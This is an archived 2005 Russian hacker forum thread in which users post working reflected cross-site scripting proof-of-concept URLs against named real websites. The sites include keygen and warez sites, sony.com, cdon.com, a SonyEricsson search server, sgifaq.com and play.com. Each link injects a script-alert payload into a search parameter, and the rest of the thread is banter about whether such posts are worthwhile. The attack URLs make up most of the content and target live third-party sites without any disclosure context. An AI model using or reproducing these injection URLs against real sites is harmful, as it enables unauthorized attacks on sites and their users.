Просмотр полной версии : Xss баги на забугорных сайтах...
x-ultra-x
06.10.2005, 18:15
1)http://www.keygen.us/
http://www.keygen.us/search.shtml?q=<script>alert('Hello!')</script>&w=cracks
2)http://www.serials.ws
В поле для поиска крэка вбиваем: <script>alert('Hello!')</script>
3)http://cracks.thebugs.ws/
аналогично:
http://cracks.thebugs.ws/search.shtml?q=<script>alert(String.fromCharCode(72,73));</script>
4)http://www.warez.com
Даже на таком известном ресурсе промелькнула дырка:
http://search.warez.com/?q=%3Cscript%...=web&e=web
5)http://www.rom-world.com/search/?q=<script>alert('Hello!')</script>&submit.x=8&submit.y=9
6)http://www.avatarity.com/search.php?sch=<script>alert(String.fromCharCode(72,73));</script>&oper=or
SladerNon
06.10.2005, 18:41
Молодец, совсем не плохо для первого поста! =) +5 от меня.
Да вы что???
Нахрена такое создавать??? Тут же уйму сайтов можно выложить!
Комо это надо???
4)http://www.warez.com (http://www.warez.com/)
Даже на таком известном ресурсе промелькнула дырка:
http://search.warez.com/?q=%3Cscript%...=web&e=web Да он ваще весь в ХСС, там куда не тыкни, везде он вылезет!
PinkPanther
07.10.2005, 00:07
Да вы что???
Нахрена такое создавать??? Тут же уйму сайтов можно выложить!
Комо это надо???Именно так набирается опыт у новичков, а пост сообщений на паблик придает стимула для дальнейших исследований, так что не надо хаить!!!! Хотя у нас это было совсем подругому....
x-ultra-x
07.10.2005, 13:20
Все когда-то начинали разве нет?(А кто раньше начал тот и быстрее закончит) Так что это только начало...
Да?! хех, ну на тебе на "известных"(как ты воразился) сайтах ХСС! Тока нахер они нужны то?! :) Так пол инэта можно в этом топике запосить! Глупо!
http://www.sony.com/SonySearch/Search.jsp?mode=go&pst=&pti=0&psti=0&st=%22%3E%3Cscript%3Ealert%28%2FPuff%2F%29%3B%3C%2 Fscript%3E&ti=0 (www.sony.com (http://www.sony.com/))
http://www.cdon.com/search_result.phtml?ed_search_value=%27%3E%3Cscrip t%3Ealert%28%2FPuff%2F%29%3C%2Fscript%3E&btn_search=Search+%BB&sl_search_field=artist (www.CDon.com (http://www.cdon.com/))
http://65.222.158.141/search?q=%3Cscript%3Ealert%28/Puff/%29%3B%3C/script%3E&output=xml_no_dtd&site=cam-es&client=frontend_cam_es&restrict=cam-es&oe=UTF-8&ie=UTF-8&proxystylesheet=frontend_cam_es&filter=p (www.SonyEricsson.com (http://www.sonyericsson.com/))
http://www.sgifaq.com/cgi-bin/faq/smartfaq.cgi?keywords=%3Cscript%3Ealert%28/Puff/%29%3B%3C%2Fscript%3E&search=Answer&match=all (www.sgifaq.com (http://www.sgifaq.com/))
http://play.com/play247.asp?pa=search&searchtype=allproducts&searchstring=%22%3E%3Cscript%3Ealert%28/Puff/%29%3B%3C%2Fscript%3E&page=search (www.play.com (http://www.play.com/))
Так что это только начало... Это понимать как??? типа ты флудить на форуме будешь?! :)) А это былоо так, для начала! :P
Именно так набирается опыт у новичков, а пост сообщений на паблик придает стимула для дальнейших исследований, так что не надо хаить!!!! Хотя у нас это было совсем подругому.... Ну да, наверное ты прав! Пусть побалуются! :)) как говориться: "Чем бы дитя не тешилось - лишь бы не ВЕШАЛОСЬ" :)))
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot